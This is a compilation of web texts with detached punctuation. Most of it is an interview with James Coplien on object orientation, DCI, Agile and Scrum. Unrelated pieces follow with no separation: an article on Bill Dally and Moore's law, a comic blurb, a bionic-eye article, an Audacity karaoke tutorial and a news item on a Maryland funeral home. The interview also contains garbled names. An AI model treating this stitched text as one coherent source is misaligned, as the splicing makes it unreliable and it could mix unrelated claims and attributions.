Tim Budd is at the University of Oregon , in the US or maybe it 's Oregon state , somewhere in the state of Oregon .
I wrote , as you know , a book called Multi- Paradigm Design for C++ and Tim Bud also wrote a book and his was called Multiparadigm Programming in Leda .
He created a programming language called Leda .
He and I discussed what do we mean by paradigms .
To me , it means the things you just said , templates and procedural and objects , but that is n't what Tim means .
To Tim , it 's things like functional programming , rule - based programming , procedural programming and object programming .
We can have some minor religious arguments , because I can say really that procedural programming and object programming are almost the same computational model , but what Tim means by paradigm is computational model .
So the rule - based paradigm is a fundamentally different way of thinking about things than procedures or objects , as is dataflow programming or functional programming .
He was maybe a little ahead of his time , at least seeing the current hype about languages like F# and Scala and so forth .
Scala has a lot of real elements of functional programming in it , and a little of applicative programming , C# really does n't .
C# is just kind of a very clean very well thought out Java in which you can do things right .
And I think it avoids a lot of the mistakes that Java made , but Scala is something different .
I do n't know where this is going to go in terms of really succeeding in the marketplace .
I 've been doing a lot of work with Trygve Reenskaug just on object orientation and getting it kind of cleaned up and figuring out what kind of real language support we need for objects over the past 3 years .
I think we have a very good story to tell about that now .
But it 's very clear to us , crystal clear that over the past 10 or 15 years that people really have n't understood what objects are about .
I do n't know if I hold out much hope for people really grasping what functional programming , applicative programming are about , how they work with each other , what the relationship is between functional programming and objects to get applicative programming so you can work in a stateful or real time environment .
There is a lot of maturity that the industry is going to have to find somewhere and I do n't know where it 's going to come from .
5 . Is it the mistake of C++ or the class - based object - oriented programming ?
Is it their fault ?
It 's easy to lay it at the feet of a programming language , but even in parallel with C++ , probably the most outspoken person about classes being fundamental is Bertrand Meyer , who 's one of the most brilliant people on the face of the earth .
Eiffel , in its own right , is a brilliant programming language and it's really thinking in terms more of design than of just programming language syntactic sugar .
Even he did n't really fall into this vision that people like Alan Kay and Nygard and Dahl or Trygve Reenskaugabout what objects really were supposed to be .
He got caught up in this class oriented view of things .
The Smalltalk people , when they put together Smalltalk originally the computational model was exactly right , in terms of thinking in terms of objects .
And then they screwed it up with the language .
The language is so class focused !
Most languages that we 're saddled with today had made this error .
C++ was not the first language there .
Smalltalk made this error before C++ did .
I do n't know exactly where Eiffel is in history , but it made about the same mistake , so did C# , so did Java .
All of them have tripped over this same stone in the road .
I do n't know if this has to do fundamentally with the Western way of thinking or maybe it 's just whoever it was there first .
Smalltalk set some expectations and everyone else just followed that way of thinking of things and we 're stuck with that .
I do n't know .
I do n't know how we fix this going forward ; I do n't know how we avoid falling into another misinformed rut .
It 's a really serious problem .
I 've seen it be the most serious problem facing the industry in any area of progress or any endeavor in my career over the past 30 or 40 years .
The same thing happened with patterns , with object oriented programming - you name it .
The good drives out the perfect .
6 . Let 's start with object orientation .
What is for you a correct object orientated computation model ?
First of all , I do n't know if that 's the right question .
I just came from this lovely talk on " What 's all the buzz about functional programming " and the speaker very nicely said there is no single answer and even if functional programming is here because of multicore the expectations are way too high .
I can tell you what objects are , but it's with a big footnote that says " So what ? "
We can define the word - " Object " is a word we use .
I 've learned a lot in the past 3 years in fact working with Trygve Reenskaug who 's the inventor of model - view - controller and he was there with Dahl and Nygard in the early days of Simula and I think has carried their vision forward and we 're now taking that vision forward into this DCI paradigm .
One of the things that most people miss is that object oriented programming is about objects .
Most people are playing with classes and there have been some glimmers of hope and light from people like Dave Ungar , who have the Self language , which is more in the direction of thinking about objects .
Academia has never really caught up with this idea of thinking in objects .
Thankfully , some of the programming languages are slowly starting to move in that direction in a really almost unconscious way , like Ruby and Python .
It 's a lot .
If you choose to think in objects in Ruby and Python , you can think in objects .
That is you are really programming objects and the class or the module is just something we need to put in there to get the objects .
On the other hand , you can write perfectly good C++ code in Ruby or Python , as well , and still be thinking in classes .
This raises a broader question about really how much does language matter .
I mean I can give you Ruby and , if you 've learned C++ , you 're still going to write C++ in Ruby .
So , it has to do with how you basically think about things and maybe that has more to do with our culture and here culture might mean our education in University or in the profession than it does with language .
I really challenge the so - called Orphean hypothesis in the programming language world .
I really do n't think that language constrains or shapes that much about what a great designer can express or does express .
I think language is greatly overrated and we need to look beyond language for the solution .
Language can help .
Good languages can entice people and excite people and open minds , but it 's not enough .
It really comes to changing world views .
7. Exactly .
In languages like Java you can do instances , but then there are patterns and everyone talks to the singleton pattern so that everything turns into classes .
What is the problem ?
I do n't know .
Java enables you to do as many instances as you want and actually it was optimized for doing objects , but people still talk to the singleton pattern , the only one on the list of patterns for not doing instances .
Is it a usability problem of the language or is it people that are not reading enough ?
Where is the problem ?
If you bring up patterns , I think that 's an interesting touchstone with respect to this problem .
The great people who use patterns , never use the word pattern .
They just do the right thing .
Christopher Alexander , which is where we get this idea of patterns from in architecture , says that patterns are just training wheels .
The words he uses are " Patterns are the gate through which we pass on our way to enlightenment . "
If you are really using patterns , you are not saying " pattern , pattern , pattern . "
You are just doing the right thing and you know when not to use patterns as well .
Very often I 'll go in and I 'll do an architecture review at a company .
They 'll say " Here we 're using the visitor pattern .
Here we 're using the adopter pattern . "
These people are still programming in terms of training wheels .
I kind of get scared .
If we 're really a profession , someone who needs to put in those kinds of comments should not be allowed to touch code that 's going to ship .
OK , because they are still in school , they are still in training mode ; they still have their training wheels on .
This whole excitement about , for example , the singleton pattern and talking about that shows that even the level of dialog about the problem has not reason to the right level of maturity yet .
The use or abuse of the singleton pattern has not been the single success or killer factor in any architecture I know of .
Yet , people get religious about this .
People get religious about details that do n't matter and very few people are talking about the big picture .
Now , everyone is talking about functional programming as being the solution tp multicore .
We just came from a talk that says " This is all about having a stateless world .
We do n't have to worry about side effects , more or less . "
But there are states in the real world .
OK ?
There are well defined demarcations of time , there are points in schedules , there are real discrete events in the real world .
And most software is based on events and messages .
That does n't have anything to do with the von Neumann paradigm , that has to do with real world happenings .
That does n't fit the functional model at all , unless you have a very degenerate form , where each event creates a new instance of the software when you execute it .
There has been very few people who thought about how we integrate the real world of events or the real world of state in object oriented programs with functional programs .
We did a lot of this in Bell Labs .
There was a guy named TomBurrowswho was my office mate and we put together a wonderful environment .
It 's still the most wonderful environment I 've ever programmed in that 's called GIL ( Graphical Interface Language ) .
It was a symbolic reflective language ; it had polymorphisms , so it had the kind of object - oriented flavor that we find in common object - oriented programming languages .
But the computational model was basically a functional model with kind of a loop built into it where you could have states .
Every time a state changed , you propagated that state change into the functional tree and did a reevaluation , updating your states .
You had this huge clock cycle that ticked every time there was a state change in the real world .
This is a paradigm that we actually used to write real code for real systems .
Some of this shipped in the control consoles of telecommunication systems and monitoring consoles and we develop a lot of understanding of this and it 's great .
I 'm seeing the same ideas come up here 20 years later .
My question is how do we get the average graduate of a University to understand these things when their professors have n't given them even either the challenge to understand them or the professors do n't know ?
Or , if the student answers on the exam , something from this kind of paradigm " No , that 's not right !
You ca n't do that in Java ! "
8 . Do you think Java is taught too early in the University ?
Often , everyone is happy to learn Java in the University , which is a way too specific language to be taught at the University .
Is it maybe one of the problems ?
Or we have way too many programmers because of simple programming languages ?
I 'm searching for an answer .
Maybe it's in the University .
We 're all searching for answers , but I actually think what 's important is to formulate the right questions .
What should the industry look like ?
Should everyone be a programmer ?
Should my mother be able to program her stove ?
Is that a model of society in the future ?
Or should programming be left in the hands of the elite few who really know what they are doing ?
I think there are many answers and there is a broad spectrum here .
I do n't want someone who has the academic credentials of a 2 - year degree having learned Java writing the software for the flight control of the airplane I 'm going to get onboard .
There was a conference in Finland where there were actually some people who were writing software for airplanes and someone asked the audience " Would you get on board of the airplane if you knew your software were on there ? "
And one guy raised his hand , the rest would not get on the airplane .
Why did the one guy raise his hand ?
He said , " I would get on there because I knew that if it were our software , the plane would n't be able to take off . "
That 's the level of professionalism we talk about .
I wish that uncle Bob was here ( we 've been in front of the camera before ) because to him professionalism is doing TDD ( Test - driven development ) .
Well , that is n't going to save us from this kind of problems .
Professionalism to me is that on a much higher level of how I am going to be responsible or answerable to society for the code I built .
That has to do with a lot of thinking and a lot more than just technique can give me .
This gets into morality .
This gets into value systems .
This gets into the systems thinking and for systems thinking you need to get beyond where we are with programming languages today .
This is one of the reasons I 'm excited about architecture these days .
That starts to get us beyond the programming language limitations and into more systems thinking .
There is an interface between those and we can use programming language to express architecture .
And that 's a great delivery vehicle for me .
I risk getting people enamored with the programming language tricks and missing the big picture , as well .
But the goal is to get them enamored with the big picture .
9 . Often people miss the concept and go for syntax or for whatever sugar of the language offers .
You 've been working also on this DCI domain context interaction pattern and I 've read the papers and articles you wrote about this and sometimes I feel it makes sense .
I read that there is a problem about object orientation .
Can you describe this ?
What is problem about object orientation that you are trying to solve with this pattern ?
There are several ways of talking about it .
DCI is data context and interactions .
It was an idea that was the brainchild of Trygve Reenskaug .
And Trygve and I have been working together on it now for about 3 years , and now there is a whole bunch of other people who joined the effort .
One of the main guys has been a guy named Rickard Oberg who 's from Stockholm .
Sometimes he works for a company called Jayway and they 've actually shipped product using the DCI paradigm .
Where do I start in terms of limitations of objects .
A lot of the limitations have to do with the fact that people think about classes .
When they express what they want to do in software , they need to express it somewhere .
They express it in code and in these classful languages , like Java , C++ , C# and so forth , we have classes , and that 's where you express it .
You need to express two kinds of things .
One is the basic form of the system .
If I 'm writing a program like a view graph builder , I 'm going to have shapes like circles and rectangles and pictures and those are objects .
The object paradigm is fine for that .
And those objects have operations on them , like resize and recolor and move and they are very primitive .
That belongs in the object , that 's where it belongs because it does n't do much with anything else .
But more serious operations like I 'm in a text editor and I have spell checking , which involves the thing I 'm spell checking as well as a dictionary and a screen and then some interaction with the user to say " Should I change this word or not ? " is not really a method on any object .
It 's just something that we have in our head and current programming languages and object methods have not given us a good home for things like spell checking .
For similar reasons , they have n't given us a good home for concepts that come up in the real world , like phone call or bank account .
Bank account is not an object .
I do n't go into my local bank and go into the safe and there is a bag with my name on it on some shelf .
I mean that 's not an object ; it 's a collection of responsibilities that are computed dynamically on the basis of some transaction logs and audit trails and other data that the actuaries own .
We 've always had a hard time finding where to put these concepts in object orientation .
That 's the problem that we 're solving - you take the use case part of the system that is what the system does and you express it in something that is n't a class .
What we 're using to express it is a collection of roles because this is how people tend to think about the activities of the system .
It is in terms of roles that objects play rather in the total interface of an object .
It 's just like right now you are Sadek Drobi , you are a person , you are an object .
How many methods are there in your interface ?
There is eating , there is dancing , there is going to conferences , there is lots of things .
But right now , in your role as an interviewer , it 's your role as an interviewer that I care about .
I 'm working with a slice of your interface and I have my interface and Diana has her interface sitting back there running the camera and we , as roles are interacting without having to put everything together in one interface .
In our old style object - oriented programming there was one interface that mixed the relatively stable data part of the architecture together with this rapidly changing dynamic part of the architecture that supports the use case .
We want to separate those out .
This is something that architects have known for years , even about buildings .
In building they are called sheer layers , like the sheer layers between layers of earth in an earthquake .
Rubchinsky ?was an architecture critic who talks about this phenomenon in architecture .
This is where you are bringing it into the object style of doing architecture in the real world in object oriented programming .
Again , this is just for object oriented programming and this is just for object oriented programming and that 's just one tool , so it 's not the total answer .
And Trygve and I are asking right now what does this look like in a concurrent environment .
That 's a whole other set of paradigms we 're going to have to bring in here .
How does this integrate with model - view - controller ?
How does this work in an interactive environment ?
So , there is still a lot of work to be done , but I think we 've really clarified a lot of what object orientation should have been and now we know how to do it .
We are actually deploying systems using it and that feels good .
10 .
It feels like it 's very hard to move people towards something or at least to let them try it .
There is a new concept and if it's not a programming language , people are not very interested in concepts , I feel .
It joins something that we told minutes ago , right ?
Every idea goes through three stages , I read the other day .
People will say it 's irrelevant , then they say it 's wrong , and then they say it 's obvious .
When Trygve and I published an article on Bill Venners ' web site , artima.com , that was kind of the first big integrated article on what DCI is and then there was a blog where people could interact with us .
There were a number of people that said " This is the stupidest article I 've ever read .
This is totally wrong !
You do not understand object oriented programming ! "
Here is someone telling Trygve Reenskaughe does n't understand object oriented programming and Trygve and I saw this , we looked at each other and smiled and said " Congratulations !
We 've succeeded " .
We have an idea that 's good enough that it 's made people in the rut uncomfortable .
Maybe they do n't even know they are in the rut or maybe they do n't even know they are uncomfortable , but they can't even see the new vision .
They 're blind because of what academia and culture have been feeding them .
We know we 're onto something very important .
We know it works .
We even have some metrics now , we have some measures to show we 're really on the right track .
We have a deployed system that we know it works , but there is tremendous resistance .
I do n't know when the clock should start ticking .
From the time when objects first were really realized , about 1967 until they really became in use was about 17 years .
1984 or so is when you started seeing things come alive in the object community and it may be the same for DCI .
So I do n't know where the clock starts .
But give it 13 - 15 years , then you 'll start seeing people say " Of course , this is obvious . "
If I live that long , I 'll look to see if people are doing it then .
11 . If we go concretely into things , like I do object orientation and my problem is that often I search the code for where is the algorithm , where is the real thing that has been happening and I see it spread everywhere into polymorphism .
If I do n't have a very advanced IDE I do n't get what 's going on .
Is ta problem that is solved with DCI ?
That 's exactly the problem we are trying to solve with the DCI .
I can look at the algorithm in the source .
The object oriented people were right in that objects should be kind of intelligent at runtime in doing their part and only their and to the degree that they know about other parts it 's a bad thing .
Because then the coupling and cohesion are wrong .
Objects should be relatively isolated , but we do n't code objects , we code classes .
There has been this confusion .
With respect to the algorithm that you can't find , I should be able to find that algorithm because its parts do belong together and you 're right - the object religion says that we have to put this algorithm into a barrel and blow it up with dynamite and then allocate the fragments to all of these classes .
That 's called allocation of responsibilities .
But we 're constrained in the way we allocate responsibilities by the domain partitioning of the classes .
Good classes follow Eric Evan 's domain driven design , but that is n't the ideal partitioning for carving up the algorithm .
Roles are the ideal partitioning for carving up the algorithm into parts or chunks that you can understand and then you need to dynamically map the roles onto objects at runtime .
But we want an administrated entity where we can reason about the algorithm the same way I could reason about it in Fortran .
There , I said it !
I said the " F " word - Fortran .
Procedural programming still has its place for some definition of procedural programming .
If it quacks like an algorithm and flies like an algorithm , and it walks like an algorithm , I should be able to deal with it as a programmer , like an algorithm .
That 's what DCI is about .
It is restoring the identity of that algorithm while still honoring all of the principles of coupling and cohesion of the object paradigm .
12 . To be able to use DCI , I need some support from my preferred programming language .
Are there now languages that support the DCI paradigm ?
" Support " is one of these fighting words .
It is possible , in C++ , using templates .
We 've known how to do traits and templates for 20 years .
You can use these traits to inject these roles , which in C++ we represent as classes into the domain classes .
Scala does it very directly .
Scala has first class citizens called " traits " and we can use those to capture the roles .
It 's really beautiful in Scala .
There are stylistic things you can do in Ruby and Python that are very elegant , extremely elegant ways of communicating this .
They are 90 % there .
There is n't something called a role in Python or Ruby or Scala or C++ , but you kind of do it .
So far , we have only found one language in which you can't do this .
I said this 2 years ago at JAOO , that 's Java and that 's interesting in the sense that we had a lot of people try it and the solutions are all just unbelievably ugly .
My hope is that we can push the Java community into a direction where they evolve the language to be able to support this .
There is no limitation in the JVM .
This works in Scala and Scala can compile to the JVM .
The Jayway people in Sweden have created an environment where they put some annotations into the Java code that allows it to do full boom DCI .
This is the first real commercial application of DCI and it works .
The syntax is a little ugly because it 's based on annotations , but if we can push the Java programming community into adding that to a forthcoming Java standard , then we 're in good shape and that 's my hope right now , that 's my dream .
I 'm doing a lot of work with people like Rickard and other people at Jayway to push this forward .
13 . Moving to Agile , I 've been at a good keynote by Martin and he listed a lot of things I should be doing , like testing and things like practices I should be doing all the time .
I can swear to you that all my colleagues do it , but still I 'm pretty sure they produce bad code .
What 's the problem ?
Bob and I always have an interesting dialog .
Most of what Bob says by all means do it .
I really like his book , Clean Code .
There is no rocket science in there .
It 's just have good indentation , have very descriptive identifier names , keep your function short .
All of these things are just hallmarks of someone who 's competent .
I do n't know if it 's enough to call them professional , but at least it 's a sign of good housekeeping .
However , the important things , the things that really matter , where the leverage is , is in architecture and in system thinking .
Bob knows architecture very well , too .
We have slightly different perspectives on this , but we have some very strong shared perspectives on architecture .
It 's just that Bob has chosen not to make that the thing he talks most of the time so far .
He 's talking about kind of the training wheels because that 's where the industry is and Bob knows that .
What Bob is telling people is perfectly appropriate for his audience , Bob knows his audience .
I have maybe a slightly different audience and I 'm trying to raise a bar a little bit .
So I 'm trying to say " Let 's think in terms of architecture .
Let 's think in terms of domain knowledge .
Let 's think in terms of the mental models of the users of the system and the domain experts and do this at a level of systems thinking . "
That perfectly complements the things that Bob talks about most of the time .
Once in a while , we 'll have a very nice agreement .
I do n't know if I 'm going to show this in my talk tomorrow , but I showed it in my tutorial where Bob Martin is talking about architecture and saying " There were the days and we thought that just throwing a few tests at the system and running a few tests are going to be enough to give you good architecture . "
( Pardon me , but can I use a bad word on this tape ?
Never mind , you can find it on the web , it 's called the Scatology of Software Architecture - given the word " scatology " you can guess the rest . )
We have very important points of agreement and by all means , keep your house clean !
Software and programming are a discipline and Agile does not mean laid back California guitar playing programming .
It is a hard discipline that requires getting up and brushing your teeth in the morning and scrubbing your code and relentlessly refactoring it to make it beautiful .
I like how Bob is leading the charge of this in the industry .
On the other hand , we also need the systems thinking and that 's what I 've been encouraging people to do .
Think in terms of domain analysis .
Think in terms of the big market picture .
Think in terms of mental models of programmers and the mental models of your end users .
Everything matters .
14 . Thinking about Agile , looking at the Agile Manifesto , it does n't have anything that talks about this ability of a software .
It does work in software , but not usable software .
If I were to do a new edition of the Agile manifesto , I 'd change " working software " to " usable software " and I 'd change " customer " to " end user " and a few other changes in that regard .
This is a bug in the Agile manifesto .
I saw a posting in fact from Alistair Coburn , who as we know , was very instrumental in the manifesto and he said the same thing .
He says " We blew it .
We missed this issue of the usability of the software . "
Someone asked me in another interview the other day " What 's next ?
What 's the next big thing ? " and I said " I do n't know what the next breakthrough will be , I can tell you what some of the new feds will probably be .
If I had any wish of what the next breakthrough would be or the next thing people get excited about it's not going to be functional programming , it 's user experience . "
It 's getting into the psychology of computer programming , all the way from the kind of things that Jerry Wineberg talks about , into the psychology of the programmer , into making mental models of how people think about the programs they are using .
That 's where I wish the next great products would come from .
Again , people who come into programming , come through academia and they usually do not have programs in psychology or mental models or even in interaction design , or ergonomics or just the basics of the mechanics of design of good interfaces and it's all left up to a tool .
" Use this , GUI builder and everything will be fine ! " and nothing is further from the truth .
Good interface design is really hard and there are very precious few people who are skilled in that in today 's world and we need more of these people .
15 .
Are you suggesting that usability starts from code that a programmer writes ?
I do n't know if it starts at code but it stops at code .
It involves code .
Kent Beck used to say " You can not hide bad code behind a good interface " and I totally agree with him .
There is not much Kent and I agree on this level , but it 's good to agree with Kent on something .
This represents again another fundamental misunderstanding of what object oriented programming is about .
Alan Kay 's vision is a thing called The Dynabook , where at birth , every child is issued a computer , which is an extension of their mind and processing ability and of the memory .
You get technology upgrades and everything , but the idea is that the objects that are in your human mind are also in the mind of this computer and should have as seamless an integration between them as possible .
That 's why Trygve did model - view - controller , to make that link between the memory of the computer and the memory of the human being .
Good objects are about capturing the end user mental model in the code , in the program and most object oriented programmers do n't think this .
They think what object oriented programming is is encapsulation and coupling and cohesion and polymorphism and interfaces and classes and they completely miss the big picture , which is this about human mental models .
Even if we can get that into the mind of the mind of the object oriented programmers into our curricula is being what objects are about and how you find the right objects and then reduce them to classes .
That would be a start , but my fantasy would be that we do this at a much larger scale .
The main focus of programmers resides in understanding the mentality and psychology and thought processes of their markets and of the people in their markets , rather than looking for the golden chalice of coupling and cohesion .
They have something to do with each other , but the focus should be on the people .
16 . One of your papers was the inspiration for Scrum and Agile .
Your paper was cited by Jeff Sutherland and it was the inspiration of Scrum .
There is a small part of Scrum called stand - up meetings that was inspired by some organizational patterns work we did and in particular some work with Borland and Quattro Pro for Windows .
This notion of the Scrum , the daily Scrum at the stand - up meeting , the inspiration for that came from some work I did .
17 .
What do you think of the state of Scrum today ?
People seem to be getting more and more certifications .
I 'm afraid it 's getting into a certification kind of business or what is it ?
I am a Scrum trainer and so I am in the middle of this .
In fact , I resisted being a Scrum trainer for about a year and a half or 2 years , just because of the problem that we 're seeing now .
Most people who are practicing Scrum think of it as a set of techniques .
I go home and I do a product backlog and I do this and I do that and then I 'll be Scrum and I 'll pass the Nokia test ( All hail the Nokia test ) and I can say that I 'm doing Scrum .
I think for the good people who are honestly trying to do Scrum , that 's kind of the state - of - the - art as people have this checklist and they are saying " OK , am I doing all these things ? " and that 's probably worth something .
Scrum comes from a little bit of my work , but most of Scrum comes from this paper called the New Product Development Game by Takeuchi and Nonaka and this goes back into a lot industrial practices in Japan and one of the key ideas that Jeff Sutherland has about Scrum and it reflects the Japanese roots is this notion of Kaizen .
I was having lunch in Finland at a conference a couple of years ago and there were some guys sitting around the table and it was all guys and you know what happens when you have guys at the table .
It 's this chest beating thing going on .
So someone said : " We 're Scrum because it gives us productivity " and another guy said " We use Scrum because it gives us high quality . "
Then there is this other guy who is kind of humble and he says " We use Scrum because it shows us where our problems are " .
That 's what Scrum is .
Scrum is something that makes problems visible , it is about openness and honesty and visibility is about making problems visible and there is kind of a morality behind this .
In contemporary software , if you found a bug , " We 're going to fix you , we 're going to reeducate you , we 're going to have tools to find these bugs .
We 're going to make sure you wo n't do this again " .
Whereas in Scrum , if you find a bug , it 's like " Oh , you found a bug !
Thank you !
That shows an error in our process .
Now we have information .
We can improve our process .
Thank you for finding that , for creating that bug .
That 's shows an error in our process . "
Scrum is about continuous improvement .
Very few people who practice Scrum get that .
There are a lot of people throwing around terms like Kaizen .
I was in Japan about a month ago and one of the things I learnt there is that you can't do Kaizen without Hansei .
Hansei is this very deep sense of sadness or regret that is going to drive me to make things better .
I have to feel honestly sorry and regretful about what I 'm doing .
Again , this is about feelings and it's about people , it 's not about " OK , we will do the mechanical procedure to do process improvement here because we have found this bug . "
No , this is about people and changing people .
Jeff Sutherland understands this and I do n't think a lot of the Scrum community does .
I 'm not even sure a lot of Scrum trainers understand this .
I think the state of Scrum is it 's become sadly kind of another methodology .
If Jeff Sutherland were here , he would be very alarmed by this .
Scrum is not a methodology , but I think that 's how most people are adopting it - the set of checklist and practices that they can say " Well , no one can blame me , because I can show you that I pass the Nokia test . "
And you should be looking to be blamed all the time , because that 's the only way you improve .
18 . You just told that you are working on a book called Lean Architecture .
Can you tell us a bit about this book ?
This comes out of the work that I did with Trygve on DCI as well as earlier work on domain analysis and a lot of the work of my wife Gertrud Bjornvig on requirements and on what requirements formalism to use in Agile .
Of course , there is a broad variety of these .
The book is n't only about nerd stuff , like DCI and domain analysis and what the code looks like and what you should deliver , but it 's also about the people .
What are the roles and how do they interact .
The main theme that goes through the book comes from Lean , it comes from these Japanese practices that underlie Scrum and that 's a single piece continuous flow , where the whole team works together on every element .
The whole team does analysis , the whole team does design , the whole team does implementation .
This is how Canon and Honda and all these other companies were working as described in this paper , by Takeuchi and Nonaka that inspired Scrum .
This is where the real quality and productivity ( if you care about productivity ) come from in Scrum .
What we 've done is we 've brought that notion over into software architecture .
People have a really hard time getting this .
Earlier we talked about people have a hard time understanding programming language .
People have a hard time understanding this single piece of continuous flow .
In fact , a lot of people who have tried Scrum , have now given up .
Now , there is this new fad called Kanban , where instead of having single piece continuous flow , everything is done in silos , it breaks down team work , you 're doing things in discrete steps and this to me shows a very deep fundamental misunderstanding of what good development and team work are about .
But I think what it is it 's a fallback position for the weak , who are unable to make teams work , but they can prove that they have a process and they show they have a process working .
Just like a Java programmer can say " OK , I 'll show you that I 'm programming in Java .
Therefore I must object oriented " .
I 'm using Kanban therefore and because that 's such a fancy Japanese word , I must be very good . "
The level of systems understanding in the current industry is very poor and that 's why I wanted to get out our vision , Gertrud 's vision and my vision , about what system development should emphasize in this architectural perspective .
It 's not just a vision .
This is something we 've seen work in dozens and dozens of companies , for many years .
It 's not rocket science , but it 's just something that people are doing .
As we say in Scrum , Scrum is all about common sense , but common sense is very uncommon and that 's what a lot of it is .
19 .
Did you cross teams with more than 3 - 4 that really works well ?
Maybe it is about the team size .
When we get a lot of programmers or the team a lot of members , it just does n't ' work .
You 're certainly right , but words mean things .
I know that Diana Larsen put up a definition of team .
This was at a conference in Florida , about a year ago , where a team is a group of 5 ± 2 co-located people working towards a common goal .
I remember when I was in AT&T we talked about the 5 ESS team , which at that time was 500 people .
500 people are not ateam .
There is something , and maybe they have a common goal , but they 're not a team .
Words mean things and this word " team " means a small group , so of course teams are effective , but to be effective they have to be small .
The more experience we have with Agile , the more we 're finding .
In the earlier days it was seen of 7 ± 2 people , because it was this magic number that comes out of the short term memory analysis in human psychology , which is 7 ± 2 , which people throw around a lot .
We 're finding that 3 is better than 5 .
It 's small teams that can really perform .
Size has a lot to do with it .
That 's something we found in a research behind the organizational patterns book .
In fact , there is a lot of empirical analysis in there where we look at team size and correlate that to things that matter to the business .
Small teams are important .
Bill Dally , the chief scientist and senior vice president of research at Nvidia , wrote an article for Forbes purporting that Moore 's Law , the theory that transistor count and performance would double every 18 months , is dead .
The problem , according to Dally 's paper on Forbes , is that current CPU architectures are still serial processors , while he believes that the future is in parallel processing .
He gives the example of reading an essay , where a single reader can only read one word at a time – but having a group of readers assigned to a paragraph each would greatly accelerate the process .
" To continue scaling computer performance , it is essential that we build parallel machines using cores optimized for energy efficiency , not serial performance .
Building a parallel computer by connecting two to 12 conventional CPUs optimized for serial performance , an approach often called multi-core , will not work , " he wrote .
" This approach is analogous to trying to build an airplane by putting wings on a train .
Conventional serial CPUs are simply too heavy ( consume too much energy per instruction ) to fly on parallel programs and to continue historic scaling of performance . "
" Going forward , the critical need is to build energy - efficient parallel computers , sometimes called throughput computers , in which many processing cores , each optimized for efficiency , not serial speed , work together on the solution of a problem .
A fundamental advantage of parallel computers is that they efficiently turn more transistors into more performance , " Dally added .
Dally also posed that focusing on parallel computing architectures will help resurrect Moore 's law , " Doubling the number of processors causes many programs to go twice as fast .
In contrast , doubling the number of transistors in a serial CPU results in a very modest increase in performance -- at a tremendous expense in energy . "
One big driver of the current processor design are the programs written to run on current chips .
Dally said that the long - standing , 40 - year - old serial programming practices are ones that will be hard to change , and that programmers trained in parallel programming are scarce .
" The computing industry must seize this opportunity and avoid stagnation , by focusing software development and training on throughput computers - not on multi-core CPUs , " Dally concluded .
" Let 's enable the future of computing to fly - - not rumble along on trains with wings . "
SpaceAvalanche is one of our favorite comics on the web , and we 're thrilled to have them on the site .
They update every Monday and cover topics like Batman , Star Trek and the world - ending almost as frequently as we do .
This week , we see how tough it is for that dude from Cast Away to adjust to life off the island .
Waste the rest of your afternoon over at SpaceAvalanche
A bionic eye prototype developed by researchers in Australia aims to implant an array of electrodes in the eye that can deliver electrical impulses directly to neurons in the retina .
The group , called Bionic Vision Australia , has developed a device called the wide - view neurostimulator for patients suffering from degenerative vision loss .
" It is really designed to give people back their mobility so they can move around their environment and avoid obstacles , " says Anthony Burkitt , research director of Bionic Vision Australia .
" We are also working on a second - generation product that will help people recognize faces and read large print . "
Researchers worldwide are trying to find ways to use electronics to improve visual recognition .
Last year , MIT announced it had developed a chip implant that could restore vision in some patients .
MIT 's eyeball design holds a microchip that connects to an external coil on a pair of glasses .
The chip receives visual information and activates electrodes that , in turn , fire the nerve cells that carry visual input to the brain .
Burkitt says other groups in Germany and Japan are working on similar projects .
The difference largely lies in the the number of electrodes used , the configuration of the electrodes and how the data is transmitted .
Bionic Vision Australia uses an external camera – with resolution of up to 5 megapixels – mounted on a pair of glasses .
An electrode array is implanted in the eye and that connects to the central part of the retina where the greatest number of retinal neurons are present .
An external unit has vision - processing software to help generate the electrical impulses .
The communication between the electrode implant and the external unit is wireless .
" The camera itself does n't need to be very powerful because the quality of the image is n't the crucial component , " says Burkitt .
" What 's important is the vision - processing software that picks up the image and transforms it into electrical impulses . "
The resultant vision is not the same as the images that a sighted person sees .
Instead it 's a pixelated version with a relatively small number of dots : about 100 in early versions .
But it 's a beginning , says Burkitt .
Meanwhile , the team is also working on the next version of the bionic eye that will include 1,000 electrodes , delivering 10 times the resolution .
It will be made of platinum , instead of the polycrystalline diamond used for the first one , so more electrodes can be packed in and better images generated .
Burkitt and his team hope to do the first human implant in 2013 .
Here 's a closer look at what the neurostimulator will be like :
Photos : Bionic Vision prototype / BVA
How to make your own karaoke version of a song
This is the Big Lyrics guide to removing vocals from a song .
The method used in this tutorial is not perfect , but it works very well for most songs .
It wo n't completely delete the vocals from a song but it will make them a whole lot quieter , so that you may sing along freely with the lyrics provided by our website :)
In this tutorial we will use a piece of audio editing software called Audacity .
Any other software which can invert stereo tracks may be used .
What this method actually does is it inverts one of the stereo tracks from your song ( so yes , it must be a stereo track otherwise this method wo n't work ) .
The reasons this works well for mosts songs is that the vocals are pretty much the only thing in the very center of the stereo ( i.e. same volume on both tracks - so by inverting one of them you actually delete it when you put it back together ) .
Step 1 : Download audacity and open a song
Search for audacity on google or follow this link to the audacity website and download the latest version .
At the writing of this tutorial we are using 1.3.12 - beta , but the stable one also supports this .
After the installation open your desired song .
You should see two long blue bars ( this are the left and right stereo tracks ) .
If there is only one blue bar then this method will sadly not work .
Step 2 : Split the channels
Click on the track name on the top left of the track .
If you do n't see it , check out the screenshot .
Select the option Split Stereo Track .
If everything went alright you should see the track split into two tracks like this :
Step 3 : Invert one of the channels
In this tutorial we will invert the right channel .
To do this we must first select it by double clicking on the lower blue bar ( the right channel ) .
The channel is selected once it is grayed out like in the screenshot :
Now we will click on the Effect menu and select Invert .
You will notice a slight change in the lower blue bar .
Step 4 : Join the channels
Click on each of the channel names ( the same button you used for splitting the stereo track ) and select Mono .
Remember to do this on both of the tracks .
Step 5 : Play the song and sing along
That 's it .
Just push the big play button and continue browsing our website to find lyrics for the karaoke songs you 've just made .
You can also save the song with audacity into a number of different formats ( but you 'll probably choose MP3 ) so that you will only need to do this once for every song .
To do this you have to click on the File menu and select Export .
The default type is WAV but you may want to change it to MP3 because they take up much less disk space .
If you liked the tutorial please click the like button and / or share it with all your friends !
RIVERDALE , Md. --
A Maryland board has suspended the license of a Riverdale funeral home after an inspector found what seemed to be 40 bodies in body bags in its garage .
The Maryland State Board of Morticians and Funeral Directors says the Chambers Funeral Home & Crematorium has until Friday to cremate the bodies .
Then the funeral home will be closed .
The emergency suspension also affects the business ' two morticians .
The state inspector saw a pile , about 12 feet by 12 feet , of body bags containing human remains on the floor of the garage .
William Chambers , one of the funeral home 's owners , tells The Baltimore Sun that he will fight the license suspension .
Click here for a video report from MyFoxdc.com .
